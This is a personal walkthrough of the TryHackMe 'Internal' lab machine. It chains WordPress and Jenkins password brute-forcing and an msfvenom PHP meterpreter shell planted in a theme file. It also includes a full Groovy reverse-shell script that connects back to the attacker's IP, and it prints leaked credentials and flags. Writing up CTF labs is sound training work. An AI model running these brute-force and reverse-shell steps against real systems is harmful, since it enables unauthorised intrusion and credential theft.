Attacking IP
10.17.34.202
Target IP
10.10.109.1
Recon
Nmap:
nmap -A -T3 -oN nmap.txt 10.10.109.1
Output:
# Nmap 7.94SVN scan initiated Sat Dec 9 17:07:57 2023 as: nmap -A -T3 -oN nmap.txt 10.10.109.1
Nmap scan report for 10.10.109.1
Host is up (0.30s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 9 17:08:48 2023 -- 1 IP address (1 host up) scanned in 50.80 seconds
Gobuster:
gobuster dir -u http://10.10.109.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
Output:
/wordpress (Status: 301) [Size: 314] [--> http://10.10.109.1/wordpress/]
/blog (Status: 301) [Size: 309] [--> http://10.10.109.1/blog/]
/javascript (Status: 301) [Size: 315] [--> http://10.10.109.1/javascript/]
/phpmyadmin (Status: 301) [Size: 315] [--> http://10.10.109.1/phpmyadmin/]
The /blog
site is a bit ugly and the assignment tell us that:
Quote
Ensure that you modify your hosts file to reflect internal.thm
So we add an entry to /etc/hosts
to reflect internal.thm
with the target IP:
10.10.109.1 internal.thm
The site is more beautiful (?🤔).
Scan with WPScan:
wpscan -u http://10.10.109.1/blog -e vp,u
With:
-u
: specify the URL-e
: enumeratevp
: vulnerable pluginsu
: user IDs range (default: 1-10)
Output:
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
[i] User(s) Identified:
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Brute Force
Try to brute force the password of admin
by using ffuf
1:
ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.109.1/blog/wp-login.php -mc 200
We can also use wpscan
:
wpscan --url http://10.10.109.1/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt --max-threads 100
Get the password very soon:
[!] Valid Combinations Found:
| Username: admin, Password: my2boys
After login, we get the “Administration email verification” message and it reveals about the email: admin@internal.thm
In blog posts section, we see a private post (/blog/wp-admin/post.php?post=5
) that has this content:
Quote
Don’t forget to reset Will’s credentials. william:arnold147
Seem like a credential🤦♀️. But it is a rabbit hole 😱 (according to the room’s author).
Reverse Shell
On WordPress, we can use “Theme Editor” feature and edit the first theme (“Twenty Seventee”) to create reverse shell2.
Generate the script to create the reverse shell by using Metasploit Venom:
msfvenom -p php/meterpreter_reverse_tcp LHOST=tun0 LPORT=9999 -f raw > rev_shell.php
Edit the 404 template (404.php
file) and replace its content with the above script content.
Start a meterpreter section:
msfconsole -x 'use php/meterpreter_reverse_tcp;set lhost tun0;set lport 9999;exploit'
Access this URL and we will get the reverse shell:
http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php
Notice the theme name is twentyseventeen
. This name can be found by click on “Customize” button of the theme.
Aubreanna
After receive the reverse shell, try to move to the folder /home/aubreanna
but failed. This happens because the current user is www-data
(use getuid
command of meterpreter) and this user does not have the access.
Search for text file with meterpreter:
search -f *.txt
Find some interesting files:
/boot/grub/gfxblacklist.txt
/opt/wp-save.txt
Content of wp-save
:
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123
Use this to log in as user aubreanna
through SSH:
ssh aubreanna@internal.thm
After log in, read user.txt
and we have the flag:
Success
THM{int3rna1_fl4g_1}
Jenkins
Also find out a file named jenkins.txt
that reveals Jenkins endpoint: http://172.17.0.2:8080/
. This IP address, according to the room’s author, is a common address of a Docker container.
Use SSH tunneling3 to connect to the Jenkins service:
ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm
Now, the address 172.17.0.2:8080
will be forwarded to localhost:8080
. Open browser and we get the login page of Jenkins.
Use Burp Suite (can’t use ffuf
because we want to examine the response headers) to brute force the password by using Burp Suite Intruder with first 500 passwords from rockyou.txt
wordlist.
Find a response contains this header:
Set-Cookie: JSESSIONID.bb2720fc=node019otbsjxrec5d1ko5l17b7tedl22478.node0
This response size is the smallest, so maybe its payload (spongebob
) is the password. Try this password and it works.
Use “Script Console” feature in “Manage Jenkins” section to create a reverse shell in Groovy language. The script to create reverse shell:
String host="10.17.34.202";
int port=9999;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Execute the script and we will receive a reverse shell (remember to start a nc
server before).
Go to /opt
folder again and find a file named note.txt
with this content:
Aubreanna,
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account.
root:tr0ub13guM!@#123
And we found the root password 🤷♀️.
Log in, read root.txt
and we have the flag:
Success
THM{d0ck3r_d3str0y3r}
Related
list
from [[Internal]]
sort file.ctime asc
Resources
- Room: https://tryhackme.com/room/internal
- Walkthrough: https://www.youtube.com/watch?v=2TmguIvR3Kw
Footnotes
-
refer to TryHackMe - Authentication Bypass ↩
-
refer to Introduction to Shells ↩